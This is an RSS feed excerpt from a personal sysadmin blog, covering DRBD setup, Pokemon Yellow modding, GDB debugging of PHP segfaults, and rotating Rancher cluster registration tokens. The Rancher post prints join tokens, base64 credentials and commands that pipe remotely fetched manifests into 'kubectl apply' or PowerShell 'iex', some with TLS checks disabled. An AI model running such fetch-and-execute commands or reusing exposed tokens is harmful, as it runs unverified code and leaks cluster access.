make -j 8
sudo make install

# Copy multipathd file to prevent it from locking the drbd disk once it&apos;s open

sudo mkdir /etc/multipath/conf.d
sudo cp /opt/drbd/etc/multipath/conf.d/drbd.conf /etc/multipath/conf.d/drbd.conf
sudo systemctl restart multipathd

# Verify it&apos;s working

sudo modprobe drbd
cat /proc/drbd

# version: 9.2.0-rc.4 (api:2/proto:110-121)
# GIT-hash: 5828124e330af6238cec2bf396145b4e04487c5f build by feax@drdb1, 2022-02-22 20:55:11
# Transports (api:18): tcp (9.2.0-rc.4)
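# If the version here does not match the tarball you compiled, an older
# packaged module was probably loaded instead. A quick sanity check -- a
# sketch that only assumes the /proc/drbd format shown above:
```shell
# Compare the running DRBD module version (first line of /proc/drbd) to an expected one.
check_drbd_version() { awk -v want="$1" 'NR==1 { if ($2 == want) print "OK"; else print "mismatch: " $2 }'; }

# Example against the sample output above (on a real node: cat /proc/drbd | check_drbd_version 9.2.0-rc.4):
printf 'version: 9.2.0-rc.4 (api:2/proto:110-121)\n' | check_drbd_version 9.2.0-rc.4
# prints: OK
```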
</code></pre><figcaption>Compiling the DRBD tools</figcaption></figure><p>Do this on all three nodes. DRBD should be running, but nothing has been created yet. First, let&apos;s create two persistent disks. You can do diskless with even a single node, but in the next blog post, let&apos;s test the availability when one of them fails.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo lvcreate -L 5G -n test-disk ubuntu-vg
[sudo] password for feax:
  Logical volume &quot;test-disk&quot; created.</code></pre><figcaption>Creating LV device</figcaption></figure><p>Create a DRBD resource file on all three nodes.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:/opt/drbd/etc/drbd.d# cat test-disk.res
resource test-disk {
  device      minor 1;
  disk        /dev/ubuntu-vg/test-disk;
  meta-disk   internal;

  on drbd1 {
    address   192.168.178.199:7100;
    node-id   1;
  }
  on drbd2 {
    address   192.168.178.103:7100;
    node-id   2;
  }
  on drbd3 {
    disk      none;
    address   192.168.178.119:7100;
    node-id   3;
  }

  connection-mesh {
        hosts drbd1 drbd2 drbd3;
  }
}</code></pre><figcaption>DRBD resource config</figcaption></figure><p>Prepare the persistent disks on the two nodes that have backing disks.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo drbdadm create-md test-disk
  --==  Thank you for participating in the global usage survey  ==--
The server&apos;s response is:
    you are the 17th user to install this version
initializing activity log
initializing bitmap (160 KB) to all zero
Writing meta data...
New drbd meta data block successfully created.
success
feax@drbd1:~$ sudo drbdsetup new-current-uuid --clear-bitmap test-disk
</code></pre><figcaption>Prepare DRBD disks</figcaption></figure><p>Adjust the DRBD resources on all nodes and check their status.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd1:~$ sudo drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    replication:SyncSource peer-disk:Inconsistent done:14.59
  drbd3 role:Secondary
    peer-disk:Diskless</code></pre><figcaption>DRBD status after setup</figcaption></figure><p>You&apos;ll see that one node says Secondary/Diskless. Let&apos;s make this node primary, create a filesystem, and mount it.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">feax@drbd3:~$ sudo drbdadm primary test-disk
feax@drbd3:~$ sudo drbdadm status
test-disk role:Primary
  disk:Diskless
  drbd1 role:Secondary
    peer-disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
feax@drbd3:~$ sudo mkfs.ext4 /dev/drbd1
mke2fs 1.45.5 (07-Jan-2020)
Discarding device blocks: done
Creating filesystem with 1310671 4k blocks and 327680 inodes
Filesystem UUID: ece9ddae-a57c-498e-bccf-251adecf85d2
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

feax@drbd3:~$ sudo mount /dev/drbd/by-res/test-disk/0 /mnt
feax@drbd3:~$ ls /mnt
lost+found</code></pre><figcaption>Preparing a filesystem</figcaption></figure><p>Now we can write files to this filesystem without having the disk available here. Let&apos;s dive into the reliability of node failures in the next blog post.</p>]]></content:encoded></item><item><title><![CDATA[Hacking friends in Pokemon Yellow]]></title><description><![CDATA[<p>Some months ago, the source code of a game I and many others played as a kid was leaked. The game is written in assembly, and people have already reverse-engineered the original game. Still, I was very curious about the original comments in these source files. </p><p>After reading some source</p>]]></description><link>https://fe.ax/pokemon-hacking/</link><guid isPermaLink="false">62aa367b094121017a6b4015</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sun, 20 Feb 2022 22:30:42 GMT</pubDate><content:encoded><![CDATA[<p>Some months ago, the source code of a game I and many others played as a kid was leaked. The game is written in assembly, and people have already reverse-engineered the original game. Still, I was very curious about the original comments in these source files. </p><p>After reading some source files, I started figuring out how to compile it. Luckily, people online have already figured it out and posted this online. After compiling and verifying it ran in an emulator, I decided it was time to edit some assembly to allow changes I wished I always had.</p><p>One of the things I never liked while replaying the game was how the messages appeared on the screen. The typewriter-style animation takes too much time to show, even when setting it to &quot;fast&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_19-37-34.gif" class="kg-image" alt loading="lazy" width="483" height="403"><figcaption>&quot;Fast&quot; typewriter-style message</figcaption></figure><p>I&apos;ve edited the delay out. A simple change, but nice to have. 
</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_19-41-36.gif" class="kg-image" alt loading="lazy" width="482" height="401"><figcaption>Non-typewriter-style message</figcaption></figure><p>Another thing that had always bugged me was the extreme number of wild Pok&#xE9;mon that appear. So I programmed an extra menu option to activate a max repel on demand. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2020-06-07_21-39-20.gif" class="kg-image" alt loading="lazy" width="553" height="404"><figcaption>Repel changing in menu showing the memory table in the back</figcaption></figure><p>Sadly, I don&apos;t have the changed code anymore. I have the compiled binary, which could be reverse-engineered, but it wouldn&apos;t be worth the time.</p><p>Another fantastic journey was adding friends to the game. Replacing Pok&#xE9;mon was something I couldn&apos;t find explained online. The editing of the strings was the easy part, but adding the images took it to a whole other level. Images in Pok&#xE9;mon Yellow use only four colours: black, white, and two shades of a single colour. 
With the help of photoshop greyscale bitmap inverted images, my friends came alive in the game I loved.</p><figure class="kg-card kg-video-card kg-card-hascaption"><div class="kg-video-container"><video src="https://fe.ax/content/media/2022/02/2020-05-17_00-12-14_Trim.mp4" poster="https://img.spacergif.org/v1/482x402/0a/spacer.png" width="482" height="402" loop autoplay muted playsinline preload="metadata" style="background: transparent url(&apos;https://fe.ax/content/images/2022/02/media-thumbnail-ember189.jpg&apos;) 50% 50% / cover no-repeat;"></video><div class="kg-video-overlay"><button class="kg-video-large-play-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M23.14 10.608 2.253.164A1.559 1.559 0 0 0 0 1.557v20.887a1.558 1.558 0 0 0 2.253 1.392L23.14 13.393a1.557 1.557 0 0 0 0-2.785Z"/></svg></button></div><div class="kg-video-player-container kg-video-hide"><div class="kg-video-player"><button class="kg-video-play-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M23.14 10.608 2.253.164A1.559 1.559 0 0 0 0 1.557v20.887a1.558 1.558 0 0 0 2.253 1.392L23.14 13.393a1.557 1.557 0 0 0 0-2.785Z"/></svg></button><button class="kg-video-pause-icon kg-video-hide"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><rect x="3" y="1" width="7" height="22" rx="1.5" ry="1.5"/><rect x="14" y="1" width="7" height="22" rx="1.5" ry="1.5"/></svg></button><span class="kg-video-current-time">0:00</span><div class="kg-video-time">/<span class="kg-video-duration"></span></div><input type="range" class="kg-video-seek-slider" max="100" value="0"><button class="kg-video-playback-rate">1&#xD7;</button><button class="kg-video-unmute-icon"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M15.189 2.021a9.728 9.728 0 0 0-7.924 4.85.249.249 0 0 1-.221.133H5.25a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h1.794a.249.249 0 0 1 .221.133 9.73 9.73 0 0 0 7.924 4.85h.06a1 1 0 0 0 1-1V3.02a1 1 0 0 
0-1.06-.998Z"/></svg></button><button class="kg-video-mute-icon kg-video-hide"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path d="M16.177 4.3a.248.248 0 0 0 .073-.176v-1.1a1 1 0 0 0-1.061-1 9.728 9.728 0 0 0-7.924 4.85.249.249 0 0 1-.221.133H5.25a3 3 0 0 0-3 3v2a3 3 0 0 0 3 3h.114a.251.251 0 0 0 .177-.073ZM23.707 1.706A1 1 0 0 0 22.293.292l-22 22a1 1 0 0 0 0 1.414l.009.009a1 1 0 0 0 1.405-.009l6.63-6.631A.251.251 0 0 1 8.515 17a.245.245 0 0 1 .177.075 10.081 10.081 0 0 0 6.5 2.92 1 1 0 0 0 1.061-1V9.266a.247.247 0 0 1 .073-.176Z"/></svg></button><input type="range" class="kg-video-volume-slider" max="100" value="100"></div></div></div><figcaption>Adding a friend to the game</figcaption></figure><p>That&apos;s it for this journey. I wished I still had the changed assembly parts to share, but sadly I&apos;ve lost all of it due to data loss shortly after writing the extended version of this blog post.</p>]]></content:encoded></item><item><title><![CDATA[Finding (performance) issues in PHP using GDB]]></title><description><![CDATA[When a web request hangs, but you can't figure out how to find the culprit? With GDB, you can analyze PHP requests in more detail than you think.]]></description><link>https://fe.ax/checking-performance-problems-in-php-using-gdb/</link><guid isPermaLink="false">62aa367b094121017a6b4011</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Thu, 10 Feb 2022 21:42:55 GMT</pubDate><content:encoded><![CDATA[<p>Has it ever happened to you when a specific web request keeps loading and loading? Can&apos;t figure out where the code is crashing into a segfault? Say no more. You can use a tool called GDB for various complex things. It&apos;s a debugger for binary applications which can do a lot more, and we&apos;re just going to scratch the surface in one specific way. 
A way that unveils the exact functions, lines and parameters it&apos;s running.</p><p>When a web request caused PHP to segfault, I figured I could ask the kernel to make a core dump whenever this happened and read the backtrace.</p><p>Let&apos;s set up an environment to test core dumping on segfaults.</p><figure class="kg-card kg-code-card"><pre><code class="language-Dockerfile">FROM ubuntu:20.04

RUN apt-get update &amp;&amp; \
    apt-get install nano gdb ubuntu-dbgsym-keyring php-cli -y

RUN  printf &quot;deb http://ddebs.ubuntu.com focal main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-updates main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-proposed main restricted universe multiverse&quot; &gt; /etc/apt/sources.list.d/ddebs.list

RUN apt-get update &amp;&amp; \
    apt-get install libargon2-1-dbgsym libc6-dbg libgcc-s1-dbgsym libicu66-dbgsym liblzma5-dbgsym libpcre2-8-0-dbgsym libsodium23-dbgsym libssl1.1-dbgsym libstdc++6-dbgsym libxml2-dbgsym php7.4-cli-dbgsym zlib1g-dbgsym nano -y
</code></pre><figcaption>Dockerfile for testing env</figcaption></figure><p>Start it up.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@pc:~# docker build . -t coredumps:latest
...
root@pc:~# mkdir /coredumps
root@pc:~# docker run \
  --rm -it \
  --ulimit core=-1 \
  -v /coredumps:/coredumps \
  coredumps:latest
root@ee967362b789:/# cd</code></pre><figcaption>Running a container with core dumps enabled.</figcaption></figure><p>Now create a PHP script where infinite recursion will trigger a segfault.</p><figure class="kg-card kg-code-card"><pre><code class="language-PHP">&lt;?php

function make() {
    it();
}

Class TestMe {
    public function __tostring() {
        return &quot;&quot;.$this;
    }
}

function it() {
    jump();
}

function jump() {
    (string) new TestMe();
}

make();
</code></pre><figcaption>Segfaulting PHP code (Inspired by <a href="https://jolicode.com/blog/find-segfaults-in-php-like-a-boss">jolicode</a>)</figcaption></figure><p>Run it, and you&apos;ll see a segfault:</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# php index.php
Segmentation fault
</code></pre><figcaption>Segfaulting</figcaption></figure><p>Now let&apos;s make it dump its core! For the container to make a core dump, you&apos;ll need to change the core pattern on the host, and the core dump will also be saved on the host. Be sure you started the container with --ulimit core=-1.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@pc:~# echo &apos;/coredumps/core.%e.%p&apos; &gt; /proc/sys/kernel/core_pattern
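# In the pattern above, %e expands to the executable name and %p to the PID.
# A tiny illustration of the resulting file names -- a sketch of the naming
# scheme only, not kernel code:
```shell
# Mimic how the kernel expands /coredumps/core.%e.%p for a crashed process.
core_name() { printf '/coredumps/core.%s.%s\n' "$1" "$2"; }

core_name php 13
# prints: /coredumps/core.php.13
```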
</code></pre><figcaption>Enabling and sending core dumps to a directory</figcaption></figure><p>When rerunning the PHP code, the output has changed.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:~# php crash.php
Segmentation fault (core dumped)
root@ee967362b789:/# ls /coredumps/
core.php.13
</code></pre><figcaption>Creating a core dump</figcaption></figure><p>Let&apos;s load it up in GDB!</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) bt
#0  zend_call_method (object=0x7f64cef39770, obj_ce=&lt;optimized out&gt;, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238, function_name=function_name@entry=0x555c2e7922ba &quot;__tostring&quot;,
    function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a45100, param_count=0, arg1=0x0, arg2=0x0) at ./Zend/zend_interfaces.c:103
#1  0x0000555c2e6e02cd in zend_std_cast_object_tostring (readobj=&lt;optimized out&gt;, writeobj=0x7ffd05a45150, type=&lt;optimized out&gt;) at ./Zend/zend_object_handlers.c:1799
#2  0x0000555c2e6a54fe in __zval_get_string_func (try=0 &apos;\000&apos;, op=0x7f64cef39770) at ./Zend/zend_operators.c:895
#3  zval_get_string_func (op=&lt;optimized out&gt;) at ./Zend/zend_operators.c:925
#4  0x0000555c2e6a592d in concat_function (result=0x7f64cef39780, op1=&lt;optimized out&gt;, op2=op2@entry=0x7f64cef39770) at ./Zend/zend_operators.c:1852
#5  0x0000555c2e6f4e62 in ZEND_CONCAT_SPEC_CONST_TMPVAR_HANDLER () at ./Zend/zend_vm_execute.h:7480
#6  0x0000555c2e72fa7f in execute_ex (ex=0x7ffd05a45030) at ./Zend/zend_vm_execute.h:54491
#7  0x0000555c2e69f75f in zend_call_function (fci=fci@entry=0x7ffd05a45400, fci_cache=0x7f64cee8d0c0, fci_cache@entry=0x7ffd05a453e0) at ./Zend/zend_execute_API.c:812
#8  0x0000555c2e6ca66c in zend_call_method (object=0x7f64cef39700, obj_ce=&lt;optimized out&gt;, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238,
    function_name=function_name@entry=0x555c2e7922ba &quot;__tostring&quot;, function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a454d0, param_count=0, arg1=0x0, arg2=0x0)
    at ./Zend/zend_interfaces.c:103
    </code></pre><figcaption>Backtrace of the PHP process</figcaption></figure><p>Right now, it&apos;s hard to make sense of this backtrace. Let&apos;s load up the gdb init file from the PHP people, making it a lot more readable. (<a href="https://github.com/php/php-src/blob/PHP-7.4.27/.gdbinit">grab it from here</a>)</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# nano ~/.gdbinit
root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) zbacktrace
[0x7f64cef39720] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd05a45340] ???
[0x7f64cef396b0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd05a45710] ???
[0x7f64cef39640] TestMe-&gt;__tostring() /crash.php:9
...
... Goes brrrr
...
[0x7f64cee131c0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffd0623ecc0] ???
[0x7f64cee13140] jump() /crash.php:18
[0x7f64cee130e0] it() /crash.php:14
[0x7f64cee13080] make() /crash.php:4
[0x7f64cee13020] (main) /crash.php:21
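# The real trace repeats thousands of these frames, so counting is quicker
# than scrolling. The same idea works on zbacktrace output saved to a file --
# a sketch with sample frames standing in for the saved output:
```shell
# Count how many frames point at the recursive call site (crash.php line 9).
printf '%s\n' \
  '[0xa] TestMe->__tostring() /crash.php:9' \
  '[0xb] TestMe->__tostring() /crash.php:9' \
  '[0xc] jump() /crash.php:18' | grep -c 'crash.php:9'
# prints: 2
```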
</code></pre><figcaption>gdb init file from PHP</figcaption></figure><p>That&apos;s more like it. Now we can see it&apos;s crashing on line 9 of the PHP file we created. We can also run PHP directly under GDB to avoid needing a core dump file.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# gdb --args php crash.php
...
...
(gdb) run
Starting program: /usr/bin/php crash.php
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library &quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;.

Program received signal SIGSEGV, Segmentation fault.
0x0000560043641265 in zend_call_function (fci=fci@entry=0x7ffc0d9c80f0, fci_cache=fci_cache@entry=0x7ffc0d9c80d0) at ./Zend/zend_execute_API.c:677
677     ./Zend/zend_execute_API.c: No such file or directory.
(gdb) zbacktrace
[0x7f39071398e0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0d9c8400] ???
[0x7f3907139870] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0d9c87d0] ???
[0x7f3907139800] TestMe-&gt;__tostring() /crash.php:9
...
... Goes brrrr again
...
[0x7f39071396b0] TestMe-&gt;__tostring() /crash.php:9
[0x7ffc0e1c2cc0] ???
[0x7f3907013140] jump() /crash.php:18
[0x7f39070130e0] it() /crash.php:14
[0x7f3907013080] make() /crash.php:4
[0x7f3907013020] (main) /crash.php:21
</code></pre><figcaption>Directly run in GDB</figcaption></figure><p>If you need the $_SERVER variables populated, add the following wrapper script:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">#!/bin/bash

export REQUEST_URI=/myuri
export SERVER_NAME=www.example.com
export HTTP_HOST=www.example.com
export DOCUMENT_ROOT=/
export DOCUMENT_URI=/myuri
export SCRIPT_NAME=/myuri
export REQUEST_METHOD=GET
export HTTP_X_FORWARDED_PROTO=https
export REQUEST_SCHEME=https

gdb --args php crash.php</code></pre><figcaption>Fake CGI request</figcaption></figure><p>If the process is already running, you can use <em><strong>gcore</strong></em> to dump the core and check what it was doing.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@ee967362b789:/# php crash.php &amp;
[1] 55
root@ee967362b789:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4248  3576 pts/0    Ss   20:52   0:00 bash
root        37  0.3  0.0   4248  3344 pts/1    Ss   21:18   0:00 /bin/bash
root        45  0.0  0.0   5900  2904 pts/1    R+   21:18   0:00 ps aux
root        55  0.0  0.0  58940 17076 pts/0    S+   21:17   0:00 php crash.php
root@ee967362b789:/# gcore 55
...
Saved corefile core.55
[Inferior 1 (process 55) detached]
root@ee967362b789:/# gdb php ./core.55
...
...
(gdb) zbacktrace
[0x7f14d7c130f0] sleep(60) [internal function]
[0x7f14d7c13080] make() /crash.php:4
[0x7f14d7c13020] (main) /crash.php:22
root@ee967362b789:/# cat -n crash.php
     1  &lt;?php
     2
     3  function make() {
     4      sleep(60);
     5      it();
     6  }
     7
     8  Class TestMe {
     9      public function __tostring() {
    10          return &quot;&quot;.$this;
    11      }
    12  }
    13
    14  function it() {
    15      jump();
    16  }
    17
    18  function jump() {
    19      (string) new TestMe();
    20  }
    21
    22  make();
</code></pre><figcaption>GDB with gcore dumps</figcaption></figure><p>We can see it&apos;s currently sleeping on line 4 of the PHP file. </p>]]></content:encoded></item><item><title><![CDATA[Refreshing the Rancher cluster registration token]]></title><description><![CDATA[<p>There may be a time when you&apos;ll want to refresh the &quot;clusterregistrationtoken&quot; or CRT for short. You can&apos;t do this in Rancher, as far as I know.</p><p>First, let&apos;s see where this token is saved.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.</code></pre></figure>]]></description><link>https://fe.ax/refreshing-clusterregistrationtoken/</link><guid isPermaLink="false">62aa367b094121017a6b400e</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 22 Jan 2022 17:14:36 GMT</pubDate><content:encoded><![CDATA[<p>There may be a time when you&apos;ll want to refresh the &quot;clusterregistrationtoken&quot; or CRT for short. You can&apos;t do this in Rancher, as far as I know.</p><p>First, let&apos;s see where this token is saved.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h</code></pre><figcaption>CRTs without an extra cluster</figcaption></figure><p>Only the local cluster token is available right now.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  creationTimestamp: &quot;2022-01-15T20:33:33Z&quot;
  generation: 3
  name: default-token
  namespace: local
  resourceVersion: &quot;6746&quot;
  uid: 6b444468-6fd1-44a0-b862-331056a88c4d
spec:
  clusterName: local
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/xxxxx_local.yaml
    | kubectl apply -f -
  insecureNodeCommand: &quot;&quot;
  insecureWindowsNodeCommand: &quot;&quot;
  manifestUrl: https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token xxxxxxx
    --ca-checksum xxxxxxx
  token: xxxxxxx
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command &quot;&amp; {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token xxxxxxx --ca-checksum xxxxxxx
    | iex}&quot;
</code></pre><figcaption>CRT of local</figcaption></figure><p>Let&apos;s add another cluster. Once we complete the custom cluster creation wizard in Rancher&apos;s cluster management, we can see a new namespace created with a unique cluster-ID.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get ns
NAME                                     STATUS   AGE
local                                    Active   6d16h
p-rghcj                                  Active   6d16h
cattle-global-data                       Active   6d16h
p-k5j5m                                  Active   6d16h
kube-node-lease                          Active   6d17h
fleet-default                            Active   6d16h
default                                  Active   6d17h
kube-public                              Active   6d17h
cattle-impersonation-system              Active   6d16h
cattle-system                            Active   6d16h
cert-manager                             Active   6d16h
kube-system                              Active   6d17h
cattle-global-nt                         Active   6d16h
cattle-fleet-system                      Active   6d16h
cattle-fleet-clusters-system             Active   6d16h
fleet-local                              Active   6d16h
cluster-fleet-local-local-1a3d67d0a899   Active   6d16h
cattle-fleet-local-system                Active   6d16h
user-zd4f7                               Active   6d16h
c-75snr                                  Active   43m
p-skphs                                  Active   43m
p-phkbr                                  Active   43m</code></pre><figcaption>List of namespaces</figcaption></figure><p>Here we&apos;re checking out the CRTs after cluster creation.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h
c-75snr     default-token   46m
c-75snr     crt-zztbw       46m
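# If you only need the raw join token for scripting, jsonpath can pull it
# straight from the CRT object; that command is shown as a comment because it
# needs the live cluster, while the runnable line below does the same
# extraction from a saved manifest -- both are sketches based on the objects
# shown in this post:
```shell
# On the Rancher management cluster:
#   kubectl get clusterregistrationtoken.management.cattle.io crt-zztbw -n c-75snr -o jsonpath='{.status.token}'

# Equivalent extraction from a manifest saved with -o yaml:
printf '  token: jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2\n' | awk '$1 == "token:" {print $2}'
# prints: jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
```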
</code></pre><figcaption>CRT list after cluster creation</figcaption></figure><p>We can get the join command from crt-zztbw. Why it&apos;s creating a separate token is unknown to me. </p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  annotations:
    field.cattle.io/creatorId: user-zd4f7
  creationTimestamp: &quot;2022-01-22T12:32:57Z&quot;
  generateName: crt-
  generation: 2
  labels:
    cattle.io/creator: norman
  name: crt-zztbw
  namespace: c-75snr
  resourceVersion: &quot;1753365&quot;
  uid: d8bee26d-4f62-4743-90e2-4cce25f745f2
spec:
  clusterName: c-75snr
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
    | kubectl apply -f -
  insecureNodeCommand: &quot;&quot;
  insecureWindowsNodeCommand: &quot;&quot;
  manifestUrl: https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
    --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
  token: jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command &quot;&amp; {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2 --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
    | iex}&quot;</code></pre><figcaption>The new cluster registration token</figcaption></figure><p>Let Rancher provision the cluster for a while.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image-2.png" class="kg-image" alt loading="lazy" width="677" height="306" srcset="https://fe.ax/content/images/size/w600/2022/01/image-2.png 600w, https://fe.ax/content/images/2022/01/image-2.png 677w"><figcaption>Cluster provisioning</figcaption></figure><p>After the cluster is provisioned, you can check the secrets for cattle credentials in the new cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">apiVersion: v1
data:
  namespace: Yy03NXNucg==
  token: cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3
  url: aHR0cHM6Ly9yYW5jaGVyLmZlLmF4
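  # Note (added for clarity): the data values above are base64 encoded; for
  # example, the namespace value Yy03NXNucg== decodes to c-75snr
  # (decode with: echo Yy03NXNucg== | base64 -d).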
kind: Secret
metadata:
  annotations:
    field.cattle.io/projectId: c-75snr:p-phkbr
    kubectl.kubernetes.io/last-applied-configuration: |
      {&quot;apiVersion&quot;:&quot;v1&quot;,&quot;data&quot;:{&quot;namespace&quot;:&quot;Yy03NXNucg==&quot;,&quot;token&quot;:&quot;cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3&quot;,&quot;url&quot;:&quot;aHR0cHM6Ly9yYW5jaGVyLmZlLmF4&quot;},&quot;kind&quot;:&quot;Secret&quot;,&quot;metadata&quot;:{&quot;annotations&quot;:{},&quot;name&quot;:&quot;cattle-credentials-f945d4e&quot;,&quot;namespace&quot;:&quot;cattle-system&quot;},&quot;type&quot;:&quot;Opaque&quot;}
  creationTimestamp: &quot;2022-01-22T14:07:37Z&quot;
  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:data:
        .: {}
        f:namespace: {}
        f:token: {}
        f:url: {}
      f:metadata:
        f:annotations:
          .: {}
          f:kubectl.kubernetes.io/last-applied-configuration: {}
      f:type: {}
    manager: kubectl-client-side-apply
    operation: Update
    time: &quot;2022-01-22T14:07:37Z&quot;
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          f:field.cattle.io/projectId: {}
    manager: agent
    operation: Update
    time: &quot;2022-01-22T16:31:53Z&quot;
  name: cattle-credentials-f945d4e
  namespace: cattle-system
  resourceVersion: &quot;13094&quot;
  uid: 88f3edc0-088a-49cc-87eb-bd1ca80f4f55
type: Opaque</code></pre><figcaption>Cattle credentials</figcaption></figure><p>Now suppose I posted my credentials online, on a blog for example, and want to invalidate that token.</p><p>I can remove the current CRT, and Fleet will regenerate it. In this case, I remove all of them from the local (old) cluster.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr crt-zztbw
clusterregistrationtoken.management.cattle.io &quot;crt-zztbw&quot; deleted
marco@cp1:~$ kubectl delete clusterregistrationtoken.management.cattle.io -n c-75snr default-token
clusterregistrationtoken.management.cattle.io &quot;default-token&quot; deleted
